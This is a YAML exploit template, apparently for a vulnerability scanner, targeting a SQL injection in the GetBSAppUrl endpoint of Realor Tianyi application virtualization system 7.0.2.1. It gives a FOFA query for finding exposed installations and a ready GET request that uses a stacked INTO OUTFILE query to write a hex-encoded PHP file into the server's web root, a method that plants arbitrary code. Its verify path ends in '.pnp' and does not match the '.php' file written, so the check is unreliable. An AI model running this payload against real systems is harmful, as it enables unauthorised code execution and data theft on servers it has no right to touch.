product: 瑞友天翼应用虚拟化系统
vName: 瑞友天翼应用虚拟化系统 GetBSAppUrl SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 瑞友 应用虚拟化系统 GetBSAppUrl方法存在SQL注入漏洞，由于参数传入没有进行过滤导致存在SQL注入，攻击者通过漏洞可以获取数据库敏感信息
version: '瑞友应用虚拟化系统 7.0.2.1'
note: ''
search:
  FOFA: app="REALOR-天翼应用虚拟化系统"
protocol: http
link: ''
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /index.php?s=/Agent/GetBSAppUrl/AppID/')%3bselect+0x3c3f70687020706870696e666f28293b3f3e+into+outfile+%27C%3a\\Program+Files+(x86)\\RealFriend\\Rap+Server\\WebRoot\\52e039302a62d077.php%27%23/123
    verify:
      path: '/52e039302a62d077.pnp'
      logic: and
      check:
        - status: 200
          body:
            value:
              - PHP Version
              - Build Date
            logic: and